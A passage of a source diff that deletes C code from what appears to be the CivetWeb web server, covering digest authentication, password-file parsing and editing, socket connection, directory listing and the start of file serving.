-		return 0;
-	}
-
-	/* Convert the nonce from the client to a number. */
-	nonce ^= conn->ctx->auth_nonce_mask;
-
-	/* The converted number corresponds to the time the nounce has been
-	 * created. This should not be earlier than the server start. */
-	/* Server side nonce check is valuable in all situations but one:
-	 * if the server restarts frequently, but the client should not see
-	 * that, so the server should accept nonces from previous starts. */
-	/* However, the reasonable default is to not accept a nonce from a
-	 * previous start, so if anyone changed the access rights between
-	 * two restarts, a new login is required. */
-	if (nonce < (uint64_t)conn->ctx->start_time) {
-		/* nonce is from a previous start of the server and no longer valid
-		 * (replay attack?) */
-		return 0;
-	}
-	/* Check if the nonce is too high, so it has not (yet) been used by the
-	 * server. */
-	if (nonce >= ((uint64_t)conn->ctx->start_time + conn->ctx->nonce_count)) {
-		return 0;
-	}
-#else
-	(void)nonce;
-#endif
-
-	/* CGI needs it as REMOTE_USER */
-	if (ah->user != NULL) {
-		conn->request_info.remote_user = mg_strdup(ah->user);
-	} else {
-		return 0;
-	}
-
-	return 1;
-}
-
-
-static const char *
-mg_fgets(char *buf, size_t size, struct mg_file *filep, char **p)
-{
-	const char *eof;
-	size_t len;
-	const char *memend;
-
-	if (!filep) {
-		return NULL;
-	}
-
-	if ((filep->access.membuf != NULL) && (*p != NULL)) {
-		memend = (const char *)&filep->access.membuf[filep->stat.size];
-		/* Search for \n from p till the end of stream */
-		eof = (char *)memchr(*p, '\n', (size_t)(memend - *p));
-		if (eof != NULL) {
-			eof += 1; /* Include \n */
-		} else {
-			eof = memend; /* Copy remaining data */
-		}
-		len =
-		    ((size_t)(eof - *p) > (size - 1)) ? (size - 1) : (size_t)(eof - *p);
-		memcpy(buf, *p, len);
-		buf[len] = '\0';
-		*p += len;
-		return len ? eof : NULL;
-	} else if (filep->access.fp != NULL) {
-		return fgets(buf, (int)size, filep->access.fp);
-	} else {
-		return NULL;
-	}
-}
-
-/* Define the initial recursion depth for procesesing htpasswd files that
- * include other htpasswd
- * (or even the same) files.  It is not difficult to provide a file or files
- * s.t. they force civetweb
- * to infinitely recurse and then crash.
- */
-#define INITIAL_DEPTH 9
-#if INITIAL_DEPTH <= 0
-#error Bad INITIAL_DEPTH for recursion, set to at least 1
-#endif
-
-struct read_auth_file_struct {
-	struct mg_connection *conn;
-	struct ah ah;
-	const char *domain;
-	char buf[256 + 256 + 40];
-	const char *f_user;
-	const char *f_domain;
-	const char *f_ha1;
-};
-
-
-static int
-read_auth_file(struct mg_file *filep,
-               struct read_auth_file_struct *workdata,
-               int depth)
-{
-	char *p;
-	int is_authorized = 0;
-	struct mg_file fp;
-	size_t l;
-
-	if (!filep || !workdata || (0 == depth)) {
-		return 0;
-	}
-
-	/* Loop over passwords file */
-	p = (char *)filep->access.membuf;
-	while (mg_fgets(workdata->buf, sizeof(workdata->buf), filep, &p) != NULL) {
-		l = strlen(workdata->buf);
-		while (l > 0) {
-			if (isspace(workdata->buf[l - 1])
-			    || iscntrl(workdata->buf[l - 1])) {
-				l--;
-				workdata->buf[l] = 0;
-			} else
-				break;
-		}
-		if (l < 1) {
-			continue;
-		}
-
-		workdata->f_user = workdata->buf;
-
-		if (workdata->f_user[0] == ':') {
-			/* user names may not contain a ':' and may not be empty,
-			 * so lines starting with ':' may be used for a special purpose
-			 */
-			if (workdata->f_user[1] == '#') {
-				/* :# is a comment */
-				continue;
-			} else if (!strncmp(workdata->f_user + 1, "include=", 8)) {
-				if (mg_fopen(workdata->conn,
-				             workdata->f_user + 9,
-				             MG_FOPEN_MODE_READ,
-				             &fp)) {
-					is_authorized = read_auth_file(&fp, workdata, depth - 1);
-					(void)mg_fclose(
-					    &fp.access); /* ignore error on read only file */
-
-					/* No need to continue processing files once we have a
-					 * match, since nothing will reset it back
-					 * to 0.
-					 */
-					if (is_authorized) {
-						return is_authorized;
-					}
-				} else {
-					mg_cry(workdata->conn,
-					       "%s: cannot open authorization file: %s",
-					       __func__,
-					       workdata->buf);
-				}
-				continue;
-			}
-			/* everything is invalid for the moment (might change in the
-			 * future) */
-			mg_cry(workdata->conn,
-			       "%s: syntax error in authorization file: %s",
-			       __func__,
-			       workdata->buf);
-			continue;
-		}
-
-		workdata->f_domain = strchr(workdata->f_user, ':');
-		if (workdata->f_domain == NULL) {
-			mg_cry(workdata->conn,
-			       "%s: syntax error in authorization file: %s",
-			       __func__,
-			       workdata->buf);
-			continue;
-		}
-		*(char *)(workdata->f_domain) = 0;
-		(workdata->f_domain)++;
-
-		workdata->f_ha1 = strchr(workdata->f_domain, ':');
-		if (workdata->f_ha1 == NULL) {
-			mg_cry(workdata->conn,
-			       "%s: syntax error in authorization file: %s",
-			       __func__,
-			       workdata->buf);
-			continue;
-		}
-		*(char *)(workdata->f_ha1) = 0;
-		(workdata->f_ha1)++;
-
-		if (!strcmp(workdata->ah.user, workdata->f_user)
-		    && !strcmp(workdata->domain, workdata->f_domain)) {
-			return check_password(workdata->conn->request_info.request_method,
-			                      workdata->f_ha1,
-			                      workdata->ah.uri,
-			                      workdata->ah.nonce,
-			                      workdata->ah.nc,
-			                      workdata->ah.cnonce,
-			                      workdata->ah.qop,
-			                      workdata->ah.response);
-		}
-	}
-
-	return is_authorized;
-}
-
-
-/* Authorize against the opened passwords file. Return 1 if authorized. */
-static int
-authorize(struct mg_connection *conn, struct mg_file *filep, const char *realm)
-{
-	struct read_auth_file_struct workdata;
-	char buf[MG_BUF_LEN];
-
-	if (!conn || !conn->ctx) {
-		return 0;
-	}
-
-	memset(&workdata, 0, sizeof(workdata));
-	workdata.conn = conn;
-
-	if (!parse_auth_header(conn, buf, sizeof(buf), &workdata.ah)) {
-		return 0;
-	}
-
-	if (realm) {
-		workdata.domain = realm;
-	} else {
-		workdata.domain = conn->ctx->config[AUTHENTICATION_DOMAIN];
-	}
-
-	return read_auth_file(filep, &workdata, INITIAL_DEPTH);
-}
-
-
-/* Public function to check http digest authentication header */
-int
-mg_check_digest_access_authentication(struct mg_connection *conn,
-                                      const char *realm,
-                                      const char *filename)
-{
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-	int auth;
-
-	if (!conn || !filename) {
-		return -1;
-	}
-	if (!mg_fopen(conn, filename, MG_FOPEN_MODE_READ, &file)) {
-		return -2;
-	}
-
-	auth = authorize(conn, &file, realm);
-
-	mg_fclose(&file.access);
-
-	return auth;
-}
-
-
-/* Return 1 if request is authorised, 0 otherwise. */
-static int
-check_authorization(struct mg_connection *conn, const char *path)
-{
-	char fname[PATH_MAX];
-	struct vec uri_vec, filename_vec;
-	const char *list;
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-	int authorized = 1, truncated;
-
-	if (!conn || !conn->ctx) {
-		return 0;
-	}
-
-	list = conn->ctx->config[PROTECT_URI];
-	while ((list = next_option(list, &uri_vec, &filename_vec)) != NULL) {
-		if (!memcmp(conn->request_info.local_uri, uri_vec.ptr, uri_vec.len)) {
-			mg_snprintf(conn,
-			            &truncated,
-			            fname,
-			            sizeof(fname),
-			            "%.*s",
-			            (int)filename_vec.len,
-			            filename_vec.ptr);
-
-			if (truncated
-			    || !mg_fopen(conn, fname, MG_FOPEN_MODE_READ, &file)) {
-				mg_cry(conn,
-				       "%s: cannot open %s: %s",
-				       __func__,
-				       fname,
-				       strerror(errno));
-			}
-			break;
-		}
-	}
-
-	if (!is_file_opened(&file.access)) {
-		open_auth_file(conn, path, &file);
-	}
-
-	if (is_file_opened(&file.access)) {
-		authorized = authorize(conn, &file, NULL);
-		(void)mg_fclose(&file.access); /* ignore error on read only file */
-	}
-
-	return authorized;
-}
-
-
-/* Internal function. Assumes conn is valid */
-static void
-send_authorization_request(struct mg_connection *conn, const char *realm)
-{
-	char date[64];
-	time_t curtime = time(NULL);
-	uint64_t nonce = (uint64_t)(conn->ctx->start_time);
-
-	if (!realm) {
-		realm = conn->ctx->config[AUTHENTICATION_DOMAIN];
-	}
-
-	(void)pthread_mutex_lock(&conn->ctx->nonce_mutex);
-	nonce += conn->ctx->nonce_count;
-	++conn->ctx->nonce_count;
-	(void)pthread_mutex_unlock(&conn->ctx->nonce_mutex);
-
-	nonce ^= conn->ctx->auth_nonce_mask;
-	conn->status_code = 401;
-	conn->must_close = 1;
-
-	gmt_time_string(date, sizeof(date), &curtime);
-
-	mg_printf(conn, "HTTP/1.1 401 Unauthorized\r\n");
-	send_no_cache_header(conn);
-	send_additional_header(conn);
-	mg_printf(conn,
-	          "Date: %s\r\n"
-	          "Connection: %s\r\n"
-	          "Content-Length: 0\r\n"
-	          "WWW-Authenticate: Digest qop=\"auth\", realm=\"%s\", "
-	          "nonce=\"%" UINT64_FMT "\"\r\n\r\n",
-	          date,
-	          suggest_connection_header(conn),
-	          realm,
-	          nonce);
-}
-
-
-/* Interface function. Parameters are provided by the user, so do
- * at least some basic checks.
- */
-int
-mg_send_digest_access_authentication_request(struct mg_connection *conn,
-                                             const char *realm)
-{
-	if (conn && conn->ctx) {
-		send_authorization_request(conn, realm);
-		return 0;
-	}
-	return -1;
-}
-
-
-#if !defined(NO_FILES)
-static int
-is_authorized_for_put(struct mg_connection *conn)
-{
-	if (conn) {
-		struct mg_file file = STRUCT_FILE_INITIALIZER;
-		const char *passfile = conn->ctx->config[PUT_DELETE_PASSWORDS_FILE];
-		int ret = 0;
-
-		if (passfile != NULL
-		    && mg_fopen(conn, passfile, MG_FOPEN_MODE_READ, &file)) {
-			ret = authorize(conn, &file, NULL);
-			(void)mg_fclose(&file.access); /* ignore error on read only file */
-		}
-
-		return ret;
-	}
-	return 0;
-}
-#endif
-
-
-int
-mg_modify_passwords_file(const char *fname,
-                         const char *domain,
-                         const char *user,
-                         const char *pass)
-{
-	int found, i;
-	char line[512], u[512] = "", d[512] = "", ha1[33], tmp[PATH_MAX + 8];
-	FILE *fp, *fp2;
-
-	found = 0;
-	fp = fp2 = NULL;
-
-	/* Regard empty password as no password - remove user record. */
-	if ((pass != NULL) && (pass[0] == '\0')) {
-		pass = NULL;
-	}
-
-	/* Other arguments must not be empty */
-	if ((fname == NULL) || (domain == NULL) || (user == NULL)) {
-		return 0;
-	}
-
-	/* Using the given file format, user name and domain must not contain
-	 * ':'
-	 */
-	if (strchr(user, ':') != NULL) {
-		return 0;
-	}
-	if (strchr(domain, ':') != NULL) {
-		return 0;
-	}
-
-	/* Do not allow control characters like newline in user name and domain.
-	 * Do not allow excessively long names either. */
-	for (i = 0; ((i < 255) && (user[i] != 0)); i++) {
-		if (iscntrl(user[i])) {
-			return 0;
-		}
-	}
-	if (user[i]) {
-		return 0;
-	}
-	for (i = 0; ((i < 255) && (domain[i] != 0)); i++) {
-		if (iscntrl(domain[i])) {
-			return 0;
-		}
-	}
-	if (domain[i]) {
-		return 0;
-	}
-
-	/* The maximum length of the path to the password file is limited */
-	if ((strlen(fname) + 4) >= PATH_MAX) {
-		return 0;
-	}
-
-	/* Create a temporary file name. Length has been checked before. */
-	strcpy(tmp, fname);
-	strcat(tmp, ".tmp");
-
-	/* Create the file if does not exist */
-	/* Use of fopen here is OK, since fname is only ASCII */
-	if ((fp = fopen(fname, "a+")) != NULL) {
-		(void)fclose(fp);
-	}
-
-	/* Open the given file and temporary file */
-	if ((fp = fopen(fname, "r")) == NULL) {
-		return 0;
-	} else if ((fp2 = fopen(tmp, "w+")) == NULL) {
-		fclose(fp);
-		return 0;
-	}
-
-	/* Copy the stuff to temporary file */
-	while (fgets(line, sizeof(line), fp) != NULL) {
-		if (sscanf(line, "%255[^:]:%255[^:]:%*s", u, d) != 2) {
-			continue;
-		}
-		u[255] = 0;
-		d[255] = 0;
-
-		if (!strcmp(u, user) && !strcmp(d, domain)) {
-			found++;
-			if (pass != NULL) {
-				mg_md5(ha1, user, ":", domain, ":", pass, NULL);
-				fprintf(fp2, "%s:%s:%s\n", user, domain, ha1);
-			}
-		} else {
-			fprintf(fp2, "%s", line);
-		}
-	}
-
-	/* If new user, just add it */
-	if (!found && (pass != NULL)) {
-		mg_md5(ha1, user, ":", domain, ":", pass, NULL);
-		fprintf(fp2, "%s:%s:%s\n", user, domain, ha1);
-	}
-
-	/* Close files */
-	fclose(fp);
-	fclose(fp2);
-
-	/* Put the temp file in place of real file */
-	IGNORE_UNUSED_RESULT(remove(fname));
-	IGNORE_UNUSED_RESULT(rename(tmp, fname));
-
-	return 1;
-}
-
-
-static int
-is_valid_port(unsigned long port)
-{
-	return (port <= 0xffff);
-}
-
-
-static int
-mg_inet_pton(int af, const char *src, void *dst, size_t dstlen)
-{
-	struct addrinfo hints, *res, *ressave;
-	int func_ret = 0;
-	int gai_ret;
-
-	memset(&hints, 0, sizeof(struct addrinfo));
-	hints.ai_family = af;
-
-	gai_ret = getaddrinfo(src, NULL, &hints, &res);
-	if (gai_ret != 0) {
-		/* gai_strerror could be used to convert gai_ret to a string */
-		/* POSIX return values: see
-		 * http://pubs.opengroup.org/onlinepubs/9699919799/functions/freeaddrinfo.html
-		 */
-		/* Windows return values: see
-		 * https://msdn.microsoft.com/en-us/library/windows/desktop/ms738520%28v=vs.85%29.aspx
-		 */
-		return 0;
-	}
-
-	ressave = res;
-
-	while (res) {
-		if (dstlen >= (size_t)res->ai_addrlen) {
-			memcpy(dst, res->ai_addr, res->ai_addrlen);
-			func_ret = 1;
-		}
-		res = res->ai_next;
-	}
-
-	freeaddrinfo(ressave);
-	return func_ret;
-}
-
-
-static int
-connect_socket(struct mg_context *ctx /* may be NULL */,
-               const char *host,
-               int port,
-               int use_ssl,
-               char *ebuf,
-               size_t ebuf_len,
-               SOCKET *sock /* output: socket, must not be NULL */,
-               union usa *sa /* output: socket address, must not be NULL  */
-               )
-{
-	int ip_ver = 0;
-	*sock = INVALID_SOCKET;
-	memset(sa, 0, sizeof(*sa));
-
-	if (ebuf_len > 0) {
-		*ebuf = 0;
-	}
-
-	if (host == NULL) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "NULL host");
-		return 0;
-	}
-
-	if ((port <= 0) || !is_valid_port((unsigned)port)) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "invalid port");
-		return 0;
-	}
-
-#if !defined(NO_SSL)
-#if !defined(NO_SSL_DL)
-#ifdef OPENSSL_API_1_1
-	if (use_ssl && (TLS_client_method == NULL)) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "SSL is not initialized");
-		return 0;
-	}
-#else
-	if (use_ssl && (SSLv23_client_method == NULL)) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "SSL is not initialized");
-		return 0;
-	}
-
-#endif /* OPENSSL_API_1_1 */
-#else
-	(void)use_ssl;
-#endif /* NO_SSL_DL */
-#else
-	(void)use_ssl;
-#endif /* !defined(NO_SSL) */
-
-	if (mg_inet_pton(AF_INET, host, &sa->sin, sizeof(sa->sin))) {
-		sa->sin.sin_family = AF_INET;
-		sa->sin.sin_port = htons((uint16_t)port);
-		ip_ver = 4;
-#ifdef USE_IPV6
-	} else if (mg_inet_pton(AF_INET6, host, &sa->sin6, sizeof(sa->sin6))) {
-		sa->sin6.sin6_family = AF_INET6;
-		sa->sin6.sin6_port = htons((uint16_t)port);
-		ip_ver = 6;
-	} else if (host[0] == '[') {
-		/* While getaddrinfo on Windows will work with [::1],
-		 * getaddrinfo on Linux only works with ::1 (without []). */
-		size_t l = strlen(host + 1);
-		char *h = (l > 1) ? mg_strdup(host + 1) : NULL;
-		if (h) {
-			h[l - 1] = 0;
-			if (mg_inet_pton(AF_INET6, h, &sa->sin6, sizeof(sa->sin6))) {
-				sa->sin6.sin6_family = AF_INET6;
-				sa->sin6.sin6_port = htons((uint16_t)port);
-				ip_ver = 6;
-			}
-			mg_free(h);
-		}
-#endif
-	}
-
-	if (ip_ver == 0) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "host not found");
-		return 0;
-	}
-
-	if (ip_ver == 4) {
-		*sock = socket(PF_INET, SOCK_STREAM, 0);
-	}
-#ifdef USE_IPV6
-	else if (ip_ver == 6) {
-		*sock = socket(PF_INET6, SOCK_STREAM, 0);
-	}
-#endif
-
-	if (*sock == INVALID_SOCKET) {
-		mg_snprintf(NULL,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "socket(): %s",
-		            strerror(ERRNO));
-		return 0;
-	}
-
-	set_close_on_exec(*sock, fc(ctx));
-
-	if ((ip_ver == 4)
-	    && (connect(*sock, (struct sockaddr *)&sa->sin, sizeof(sa->sin))
-	        == 0)) {
-		/* connected with IPv4 */
-		if (0 == set_non_blocking_mode(*sock)) {
-			/* Ok */
-			return 1;
-		}
-		/* failed */
-		/* TODO: specific error message */
-	}
-
-#ifdef USE_IPV6
-	if ((ip_ver == 6)
-	    && (connect(*sock, (struct sockaddr *)&sa->sin6, sizeof(sa->sin6))
-	        == 0)) {
-		/* connected with IPv6 */
-		if (0 == set_non_blocking_mode(*sock)) {
-			/* Ok */
-			return 1;
-		}
-		/* failed */
-		/* TODO: specific error message */
-	}
-#endif
-
-	/* Not connected */
-	mg_snprintf(NULL,
-	            NULL, /* No truncation check for ebuf */
-	            ebuf,
-	            ebuf_len,
-	            "connect(%s:%d): %s",
-	            host,
-	            port,
-	            strerror(ERRNO));
-	closesocket(*sock);
-	*sock = INVALID_SOCKET;
-
-	return 0;
-}
-
-
-int
-mg_url_encode(const char *src, char *dst, size_t dst_len)
-{
-	static const char *dont_escape = "._-$,;~()";
-	static const char *hex = "0123456789abcdef";
-	char *pos = dst;
-	const char *end = dst + dst_len - 1;
-
-	for (; ((*src != '\0') && (pos < end)); src++, pos++) {
-		if (isalnum(*(const unsigned char *)src)
-		    || (strchr(dont_escape, *(const unsigned char *)src) != NULL)) {
-			*pos = *src;
-		} else if (pos + 2 < end) {
-			pos[0] = '%';
-			pos[1] = hex[(*(const unsigned char *)src) >> 4];
-			pos[2] = hex[(*(const unsigned char *)src) & 0xf];
-			pos += 2;
-		} else {
-			break;
-		}
-	}
-
-	*pos = '\0';
-	return (*src == '\0') ? (int)(pos - dst) : -1;
-}
-
-/* Return 0 on success, non-zero if an error occurs. */
-
-static int
-print_dir_entry(struct de *de)
-{
-	size_t hrefsize;
-	char *href;
-	char size[64], mod[64];
-	struct tm *tm;
-
-	hrefsize = PATH_MAX * 3; /* worst case */
-	href = (char *)mg_malloc(hrefsize);
-	if (href == NULL) {
-		return -1;
-	}
-	if (de->file.is_directory) {
-		mg_snprintf(de->conn,
-		            NULL, /* Buffer is big enough */
-		            size,
-		            sizeof(size),
-		            "%s",
-		            "[DIRECTORY]");
-	} else {
-		/* We use (signed) cast below because MSVC 6 compiler cannot
-		 * convert unsigned __int64 to double. Sigh. */
-		if (de->file.size < 1024) {
-			mg_snprintf(de->conn,
-			            NULL, /* Buffer is big enough */
-			            size,
-			            sizeof(size),
-			            "%d",
-			            (int)de->file.size);
-		} else if (de->file.size < 0x100000) {
-			mg_snprintf(de->conn,
-			            NULL, /* Buffer is big enough */
-			            size,
-			            sizeof(size),
-			            "%.1fk",
-			            (double)de->file.size / 1024.0);
-		} else if (de->file.size < 0x40000000) {
-			mg_snprintf(de->conn,
-			            NULL, /* Buffer is big enough */
-			            size,
-			            sizeof(size),
-			            "%.1fM",
-			            (double)de->file.size / 1048576);
-		} else {
-			mg_snprintf(de->conn,
-			            NULL, /* Buffer is big enough */
-			            size,
-			            sizeof(size),
-			            "%.1fG",
-			            (double)de->file.size / 1073741824);
-		}
-	}
-
-	/* Note: mg_snprintf will not cause a buffer overflow above.
-	 * So, string truncation checks are not required here. */
-
-	tm = localtime(&de->file.last_modified);
-	if (tm != NULL) {
-		strftime(mod, sizeof(mod), "%d-%b-%Y %H:%M", tm);
-	} else {
-		mg_strlcpy(mod, "01-Jan-1970 00:00", sizeof(mod));
-		mod[sizeof(mod) - 1] = '\0';
-	}
-	mg_url_encode(de->file_name, href, hrefsize);
-	mg_printf(de->conn,
-	          "<tr><td><a href=\"%s%s%s\">%s%s</a></td>"
-	          "<td>&nbsp;%s</td><td>&nbsp;&nbsp;%s</td></tr>\n",
-	          de->conn->request_info.local_uri,
-	          href,
-	          de->file.is_directory ? "/" : "",
-	          de->file_name,
-	          de->file.is_directory ? "/" : "",
-	          mod,
-	          size);
-	mg_free(href);
-	return 0;
-}
-
-
-/* This function is called from send_directory() and used for
- * sorting directory entries by size, or name, or modification time.
- * On windows, __cdecl specification is needed in case if project is built
- * with __stdcall convention. qsort always requires __cdels callback. */
-static int WINCDECL
-compare_dir_entries(const void *p1, const void *p2)
-{
-	if (p1 && p2) {
-		const struct de *a = (const struct de *)p1, *b = (const struct de *)p2;
-		const char *query_string = a->conn->request_info.query_string;
-		int cmp_result = 0;
-
-		if (query_string == NULL) {
-			query_string = "na";
-		}
-
-		if (a->file.is_directory && !b->file.is_directory) {
-			return -1; /* Always put directories on top */
-		} else if (!a->file.is_directory && b->file.is_directory) {
-			return 1; /* Always put directories on top */
-		} else if (*query_string == 'n') {
-			cmp_result = strcmp(a->file_name, b->file_name);
-		} else if (*query_string == 's') {
-			cmp_result = (a->file.size == b->file.size)
-			                 ? 0
-			                 : ((a->file.size > b->file.size) ? 1 : -1);
-		} else if (*query_string == 'd') {
-			cmp_result =
-			    (a->file.last_modified == b->file.last_modified)
-			        ? 0
-			        : ((a->file.last_modified > b->file.last_modified) ? 1
-			                                                           : -1);
-		}
-
-		return (query_string[1] == 'd') ? -cmp_result : cmp_result;
-	}
-	return 0;
-}
-
-
-static int
-must_hide_file(struct mg_connection *conn, const char *path)
-{
-	if (conn && conn->ctx) {
-		const char *pw_pattern = "**" PASSWORDS_FILE_NAME "$";
-		const char *pattern = conn->ctx->config[HIDE_FILES];
-		return (match_prefix(pw_pattern, strlen(pw_pattern), path) > 0)
-		       || ((pattern != NULL)
-		           && (match_prefix(pattern, strlen(pattern), path) > 0));
-	}
-	return 0;
-}
-
-
-static int
-scan_directory(struct mg_connection *conn,
-               const char *dir,
-               void *data,
-               int (*cb)(struct de *, void *))
-{
-	char path[PATH_MAX];
-	struct dirent *dp;
-	DIR *dirp;
-	struct de de;
-	int truncated;
-
-	if ((dirp = mg_opendir(conn, dir)) == NULL) {
-		return 0;
-	} else {
-		de.conn = conn;
-
-		while ((dp = mg_readdir(dirp)) != NULL) {
-			/* Do not show current dir and hidden files */
-			if (!strcmp(dp->d_name, ".") || !strcmp(dp->d_name, "..")
-			    || must_hide_file(conn, dp->d_name)) {
-				continue;
-			}
-
-			mg_snprintf(
-			    conn, &truncated, path, sizeof(path), "%s/%s", dir, dp->d_name);
-
-			/* If we don't memset stat structure to zero, mtime will have
-			 * garbage and strftime() will segfault later on in
-			 * print_dir_entry(). memset is required only if mg_stat()
-			 * fails. For more details, see
-			 * http://code.google.com/p/mongoose/issues/detail?id=79 */
-			memset(&de.file, 0, sizeof(de.file));
-
-			if (truncated) {
-				/* If the path is not complete, skip processing. */
-				continue;
-			}
-
-			if (!mg_stat(conn, path, &de.file)) {
-				mg_cry(conn,
-				       "%s: mg_stat(%s) failed: %s",
-				       __func__,
-				       path,
-				       strerror(ERRNO));
-			}
-			de.file_name = dp->d_name;
-			cb(&de, data);
-		}
-		(void)mg_closedir(dirp);
-	}
-	return 1;
-}
-
-
-#if !defined(NO_FILES)
-static int
-remove_directory(struct mg_connection *conn, const char *dir)
-{
-	char path[PATH_MAX];
-	struct dirent *dp;
-	DIR *dirp;
-	struct de de;
-	int truncated;
-	int ok = 1;
-
-	if ((dirp = mg_opendir(conn, dir)) == NULL) {
-		return 0;
-	} else {
-		de.conn = conn;
-
-		while ((dp = mg_readdir(dirp)) != NULL) {
-			/* Do not show current dir (but show hidden files as they will
-			 * also be removed) */
-			if (!strcmp(dp->d_name, ".") || !strcmp(dp->d_name, "..")) {
-				continue;
-			}
-
-			mg_snprintf(
-			    conn, &truncated, path, sizeof(path), "%s/%s", dir, dp->d_name);
-
-			/* If we don't memset stat structure to zero, mtime will have
-			 * garbage and strftime() will segfault later on in
-			 * print_dir_entry(). memset is required only if mg_stat()
-			 * fails. For more details, see
-			 * http://code.google.com/p/mongoose/issues/detail?id=79 */
-			memset(&de.file, 0, sizeof(de.file));
-
-			if (truncated) {
-				/* Do not delete anything shorter */
-				ok = 0;
-				continue;
-			}
-
-			if (!mg_stat(conn, path, &de.file)) {
-				mg_cry(conn,
-				       "%s: mg_stat(%s) failed: %s",
-				       __func__,
-				       path,
-				       strerror(ERRNO));
-				ok = 0;
-			}
-
-			if (de.file.is_directory) {
-				if (remove_directory(conn, path) == 0) {
-					ok = 0;
-				}
-			} else {
-				/* This will fail file is the file is in memory */
-				if (mg_remove(conn, path) == 0) {
-					ok = 0;
-				}
-			}
-		}
-		(void)mg_closedir(dirp);
-
-		IGNORE_UNUSED_RESULT(rmdir(dir));
-	}
-
-	return ok;
-}
-#endif
-
-
-struct dir_scan_data {
-	struct de *entries;
-	unsigned int num_entries;
-	unsigned int arr_size;
-};
-
-
-/* Behaves like realloc(), but frees original pointer on failure */
-static void *
-realloc2(void *ptr, size_t size)
-{
-	void *new_ptr = mg_realloc(ptr, size);
-	if (new_ptr == NULL) {
-		mg_free(ptr);
-	}
-	return new_ptr;
-}
-
-
-static int
-dir_scan_callback(struct de *de, void *data)
-{
-	struct dir_scan_data *dsd = (struct dir_scan_data *)data;
-
-	if ((dsd->entries == NULL) || (dsd->num_entries >= dsd->arr_size)) {
-		dsd->arr_size *= 2;
-		dsd->entries =
-		    (struct de *)realloc2(dsd->entries,
-		                          dsd->arr_size * sizeof(dsd->entries[0]));
-	}
-	if (dsd->entries == NULL) {
-		/* TODO(lsm, low): propagate an error to the caller */
-		dsd->num_entries = 0;
-	} else {
-		dsd->entries[dsd->num_entries].file_name = mg_strdup(de->file_name);
-		dsd->entries[dsd->num_entries].file = de->file;
-		dsd->entries[dsd->num_entries].conn = de->conn;
-		dsd->num_entries++;
-	}
-
-	return 0;
-}
-
-
-static void
-handle_directory_request(struct mg_connection *conn, const char *dir)
-{
-	unsigned int i;
-	int sort_direction;
-	struct dir_scan_data data = {NULL, 0, 128};
-	char date[64];
-	time_t curtime = time(NULL);
-
-	if (!scan_directory(conn, dir, &data, dir_scan_callback)) {
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Cannot open directory\nopendir(%s): %s",
-		                   dir,
-		                   strerror(ERRNO));
-		return;
-	}
-
-	gmt_time_string(date, sizeof(date), &curtime);
-
-	if (!conn) {
-		return;
-	}
-
-	sort_direction = ((conn->request_info.query_string != NULL)
-	                  && (conn->request_info.query_string[1] == 'd'))
-	                     ? 'a'
-	                     : 'd';
-
-	conn->must_close = 1;
-	mg_printf(conn, "HTTP/1.1 200 OK\r\n");
-	send_static_cache_header(conn);
-	send_additional_header(conn);
-	mg_printf(conn,
-	          "Date: %s\r\n"
-	          "Connection: close\r\n"
-	          "Content-Type: text/html; charset=utf-8\r\n\r\n",
-	          date);
-	mg_printf(conn,
-	          "<html><head><title>Index of %s</title>"
-	          "<style>th {text-align: left;}</style></head>"
-	          "<body><h1>Index of %s</h1><pre><table cellpadding=\"0\">"
-	          "<tr><th><a href=\"?n%c\">Name</a></th>"
-	          "<th><a href=\"?d%c\">Modified</a></th>"
-	          "<th><a href=\"?s%c\">Size</a></th></tr>"
-	          "<tr><td colspan=\"3\"><hr></td></tr>",
-	          conn->request_info.local_uri,
-	          conn->request_info.local_uri,
-	          sort_direction,
-	          sort_direction,
-	          sort_direction);
-
-	/* Print first entry - link to a parent directory */
-	mg_printf(conn,
-	          "<tr><td><a href=\"%s%s\">%s</a></td>"
-	          "<td>&nbsp;%s</td><td>&nbsp;&nbsp;%s</td></tr>\n",
-	          conn->request_info.local_uri,
-	          "..",
-	          "Parent directory",
-	          "-",
-	          "-");
-
-	/* Sort and print directory entries */
-	if (data.entries != NULL) {
-		qsort(data.entries,
-		      (size_t)data.num_entries,
-		      sizeof(data.entries[0]),
-		      compare_dir_entries);
-		for (i = 0; i < data.num_entries; i++) {
-			print_dir_entry(&data.entries[i]);
-			mg_free(data.entries[i].file_name);
-		}
-		mg_free(data.entries);
-	}
-
-	mg_printf(conn, "%s", "</table></body></html>");
-	conn->status_code = 200;
-}
-
-
-/* Send len bytes from the opened file to the client. */
-static void
-send_file_data(struct mg_connection *conn,
-               struct mg_file *filep,
-               int64_t offset,
-               int64_t len)
-{
-	char buf[MG_BUF_LEN];
-	int to_read, num_read, num_written;
-	int64_t size;
-
-	if (!filep || !conn) {
-		return;
-	}
-
-	/* Sanity check the offset */
-	size = (filep->stat.size > INT64_MAX) ? INT64_MAX
-	                                      : (int64_t)(filep->stat.size);
-	offset = (offset < 0) ? 0 : ((offset > size) ? size : offset);
-
-	if ((len > 0) && (filep->access.membuf != NULL) && (size > 0)) {
-		/* file stored in memory */
-		if (len > size - offset) {
-			len = size - offset;
-		}
-		mg_write(conn, filep->access.membuf + offset, (size_t)len);
-	} else if (len > 0 && filep->access.fp != NULL) {
-/* file stored on disk */
-#if defined(__linux__)
-		/* sendfile is only available for Linux */
-		if ((conn->ssl == 0) && (conn->throttle == 0)
-		    && (!mg_strcasecmp(conn->ctx->config[ALLOW_SENDFILE_CALL],
-		                       "yes"))) {
-			off_t sf_offs = (off_t)offset;
-			ssize_t sf_sent;
-			int sf_file = fileno(filep->access.fp);
-			int loop_cnt = 0;
-
-			do {
-				/* 2147479552 (0x7FFFF000) is a limit found by experiment on
-				 * 64 bit Linux (2^31 minus one memory page of 4k?). */
-				size_t sf_tosend =
